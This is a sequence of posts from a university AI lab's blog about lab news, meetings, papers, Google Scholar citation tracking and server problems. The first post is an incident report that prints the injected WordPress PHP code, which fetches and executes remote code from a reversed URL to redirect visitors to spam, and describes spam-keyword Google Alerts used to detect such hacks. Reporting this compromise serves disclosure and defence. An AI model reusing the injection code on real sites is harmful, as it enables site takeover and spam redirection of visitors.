Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old Wordpress installation was exploited to add the following code to the top of our blog’s main page.

< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>

This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest Wordpress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)

We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:

• adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
• viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu

I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

The results of this Google search reveal many compromised blogs from the .edu domain.

We were happy to see recent UMBC alumnus Akshay Java’s work on Twitter is mentioned in an article, Utility in the Jumble of Tweets, in yesterday’s New York Times.

“Some developers are creating tools to help companies keep an eye on the buzz. Akshay Java, a scientist at Microsoft, is trying to figure out a way to identify which experts are most influential on given topics by automatically analyzing the content of their tweets and who is in their Twitter network. Companies like Microsoft could use that information to figure out which twitterers they should contact to create buzz about a new product.”

In this week’s ebiquity meeting (10:30am Tue Oct 14), PhD student Shenyong Zhang will present his recent work with Yun Peng on SMOOTY, a new efficient method for modifying a joint probability distribution to satisfy a set of inconsistent constraints. It extends the well-known “iterative proportional fitting procedure” (IPFP) which only works with consistent constraints. Compared to existing methods, SMOOTH is computationally more efficient and insensitive to data. Moreover, SMOOTH can be easily integrated with Bayesian networks for Bayesian reasoning with inconsistent constraints. A paper on this work, An Efficient Method for Probabilistic Knowledge Integration will apear in the proceedings of The 20th IEEE International Conference on Tools with Artificial Intelligence next month.

We plan to hold our weekly ebiquity meetings on Tuesday mornings, from 10:30 to 12:00 in ITE 325b starting on September 2. We’ve not yet received confirmation that the large conference room will be available, so it’s possible that the room will change or even the day. By meeting at 10:30am we hope that Dr. Joshi will be able to join us via the Internet while he is in India. When the time changes later in the Fall we may need to start the meeting at 10:00am.

Our meetings are open and we encourage new students who are interested in our research and joining the group to drop in. We usually ask someone to present something for each meeting — either their own work, an emerging topic or problem, or an interesting new paper. Our initial meeting will be more informal, but returning members should be prepared to describe how you spent your summer and new students to introduce themselves.

As usual, you should watch the ebiquity web site for announcements of the weekly events and/or subscribe to the UMBC ebiquity events feed.

If we do need to change to room or day of the week we will send out another message early in the coming week and make a new update this post on the ebiquity blog. But for now, please reserve Tuesdays from 10:00 to 12:00 for our weekly ebiquity meeting.

After several months of procrastination, we’re on a new server. Nicer, faster, hopefully more secure. Thanks to Filip, who helped make the transition painless!

I recently bought a GPS (Garmin Mobile 10) that works with my WM5 Smartphone. In the process of trying to install the Garmin Mobile XT application (which was very problematic and a huge pain, but I digress ….), I ended up uninstalling Google Maps.

When I went to download and reinstall it though, I noticed that they have a new beta feature (My Location) that shows you where you are. It can either use a GPS, or use cell tower information. Basically, it sees which cell tower your phone is signed up to (and what signals it is seeing from others), and uses this to estimate where you are to within a 1000 meters.

This is interesting, because we did it the same way back when there used to be AMPS / CDPD and Palm IIIs and Vs with cellular modems. Our project was called Agents2Go, and we published a paper about this in the MCommerce workshop of Mobicom in 01. I remember that Muthu et al from AT&T had a similar paper in MobiDE that year as well.

The problem at that time was that there was no publicly accessible database of all cell tower locations. Also, we heard informally from at least one telco that while doing this for research was Ok, if anyone ever tried to make money from it they would want to be a part of the loop. I guess Google has found a way to work with the various telcos ? Or maybe in the interim cell tower ids and locations have been made public knowledge ?

Of course Google maps also works with GPS, except that it refuses to work with my Garmin. I’ve tried all the tricks that a search on Google will reveal (mainly, setting the serial port used by Bluetooth to talk to the GPS) , but to no avail

Sigh….

At the end of last week we had a catastrophic failure that resulted in our losing most of our posts. We had a security problem where someone had managed to compromise one of our blog accounts with administrative privileges. Some of the files were modified. We noticed it right away and decided to restore the site files and database from our nightly dump.

However … it turned out that when we did a major Wordpress update back in February 2006, we created a new database but failed to update our backup script. So, for the past 19 months, it’s been creating a nightly backup of the old database. Restoring the old database not only resulted in loosing 19 months worth of posts, but also left the database out of sync with the current Wordpress version.

One of our former students (thanks Filip!) wrote a script to recover the old posts from Google’s cache and reinsert them into the database. it was a tour de force demonstration of quick programming skill. There are still some problems that we’ll need to attend to — we’ve lost all of the new categories that we’ve added since 2/2006, the ‘related posts’ plugin is no longer working, I think the feed links aren’t all right, etc. But we recovered the posts.

We’ve tightened up our security but continue to see lots of malicious visitors knocking on the door and checking the locks.

It’s a jungle out there.

The ebiquity Matrix servers (neo, trinity, morpheus, logos, niobe, link) were successfully moved from the cybersecurity lab to one of the OIT machine room. It turned out to be quite a bit of work to get the computers into our rack. We had custom rack mounting kits, but they required that many of the components in each computer be moved within its chassis. We still need to get some parts to get Logos in, since it’s a slightly different model. Many thanks to everyone who helped: Geoff, Brendan, Anand, Akshay, Pranam, Li, Andrej, Nimish, Sheetal and Lushan. We’ve uploaded some pictures from the tail end of the move to the ebiquity flickr site. Add comments and notes if you have a flickr account.

Harry Chen blogs about Web 2.0 Validator, an automated web tool that determines how 2.0ish your Web site is based on a set of Web 2.0 characteristics. While Harry reports that his site only scored 11, it now scores 31! No, I don’t think he’s just been studying for the test so he could retake it. It appears due to Harry’s post on Web 2.0 Validator — just talking about Web 2.0 Validator makes your site seem to be a Web 2.0 site to Web 2.0 Validator. Or maybe this is related to Russell’s paradox, somehow.

Anyway, this post should help raise our own Web 2.0 factor a bit, even though the site is not in public beta, uses PHP and not Python, and we don’t really mention mash-ups, startups, Less is More, Dave Legg, the Web 2.0 Validator’s ruleset, Flickr, VC, VCs, Nitro, Firefox, Ruby, links to slashdot, or uses the blink tag.

Google Scholar, it’s a good thing, as Martha Stewart would say.

We recently added a feature to our ebiquity paper repository that ties papers to their Google Scholar entries. The main motivation was to allow us to track citations.

As I’ve worked through our papers to verify and add their Google Scholar keys, other benefits are becoming apparent. In several cases I’ve discovered errors or omissions in our own meta data. Sometimes our own entries have had the title wrong! In other cases, I’ve found several Google Scholar entries for the same paper. Sometimes this is due to an error by the author of a citing paper, which can propagate.

I suspect that some of the errors originate with us. Here’s one scenario. When a paper is accepted for publication, the author is happy and excited and adds an entry in our database, along with softcopy of the draft. People download and read the draft and, if it’s good, start citing it. Months later the ultimate copy, which may have a different title and even a different author list, is finalized. Ideally, our site is edited to reflect the final metadata and final softcopy. But, sometimes this doesn’t happen or the final softcopy is not uploaded for copyright reasons. In any case, the old, and possibly incorrect metadata and draft may have escaped to roam the Internet.

Lately I’ve started to add a header to draft copies of papers posted to our side that states that they are drafts and also where the final version will appear. I’ve found Acrobat’s ability to add a header to an existing pdf file to be very handy for this. I’ve also used Acrobat to extract the first page of an article for which we don’t hold the copyright, add a header pointing to it’s source, and post that on our site (as in this example.)

Finally, one of the ideas that underlies the current Semantic Web vision is that it’s very useful for things on the web to have good identifiers. The Uniform Resource Identifier (URI) is the Semantic Web’s favorite identifier, but we all recognize that just using URIs is to simple for many objects (e.g., people). OWL’s contribution to this is the notion of an inverse functional property. If my ontology defines SSN as an inverse functional property, then two objects that share the same SSN must be the same. So, along these lines, the googleScholarKey property should be inverse-functional and have domain=publication and range=string.

We noticed a Jose Vidal using a great idea on his publication list which we’ve added to the ebiquity site’s publication page. Jose augments his paper descriptions with data from Google Scholar (GS) — a link to the GS data, the number of citing papers, and a list of their GS data.

We think GS is likely to be increasingly important in the academic/scholarly community. It’s a way to find papers, of course, but also helps judge their significance to the field as measured by the number of citations. Citation counting is the traditional way of measuring the impact of a paper. Using Google Scholar’s citations to measure impact has its problems, a topic we’ve posted on before and is also discussed in the bibliometric circles, but it’s free and convenient, a combination that’s hard to beat. (Writing this, I wonder if anyone has tried a recursive model like that used in pagerank to citation graphs. If not, this would be an interesting experiment to do).

Here’s how our paper listings now works. We augmented the RGB paper ontology to give the paper class a new metadata property, googleKey, that is then used to derive the other properties — the number of citations and links to the GS description and the list of citing papers. Right now getting the GS Key is done manually since automating it reliably is not trivial. But we do have a link on the paper display that makes it easier to find the key by querying GS with the paper title and showing the results. If the paper is in GS, it will probably be on the first page.

Every night, an agent (well, ok, a cron job) checks Google Scholar to update the citation counts for all of the papers that have a GS key.

Our lab members tend to enter papers into the site’s database as soon as they are accepted for publication, which is long before they show up in Google Scholar and even longer before they begin to accrue citations. So authors will have to periodically check recently entered papers and update them with their GS keys when available. It will take some weeks or more before we’ve processed all of the old papers to look up their GS Key. Once we’ve done so, I think it should be easy to maintain it.

Two Ph.D. students are joining the ebiquity lab this Spring.

Wiboonsak Watthayu is a PhD candidate working with Professor Peng on the application of Bayesian networks to decision support systems with multiple uncertain criteria. He is currently teaching Computer Science in his home country of Thailand and will be on leave for the Spring so he can finish his dissertation. Wiboonsak will be sitting in ITE 368.

Lushan Han is a Ph.D. student who is just joining UMBC this semester. Lushan comes to us from the University of Delaware. Before coming to the US for graduate school, he worked in the computer industry in China and attended Peking University. Lushan is sitting in ITE 377. Lushan will initially be working on Swoogle while he decides what topic to pursue for his dissertation research.